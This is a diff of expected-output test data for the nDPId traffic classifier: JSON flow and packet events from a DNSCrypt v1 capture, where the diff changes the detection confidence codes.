00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+MAgAL0RbrQKAAABMw980JvmEPcGBNOBaUQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":390,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337048} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":390,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+MAAub0Rk4cKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+MFAAL0RUnMKAAABMw980NJ\/EPcCCHK1aUEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":946739337076,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337076,"pkt":"ZmZmZmZmRERERERECABFAADWnoBAADURNfszD3zQCgAAARD3sT8Awv\/QaUWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 
00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":946739337077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337077,"pkt":"ZmZmZmZmRERERERECABFAADWnoFAADURNfozD3zQCgAAARD32dgAwtc5aUOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":946739337077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337077,"pkt":"ZmZmZmZmRERERERECABFAADWnoJAADURNfkzD3zQCgAAARD3wzcAwu3baUKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/chAAL0ReVsKAAABp3LcfZBCAbsCCEbGm2kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/ckgAL0RlZoKAAABp3LcfZZsAbsGBGHYm2YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":397,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337078} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":397,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/ckAub0Rum0KAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/cpAAL0ReVkKAAABp3LcfZuIAbsCCEbGm2cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 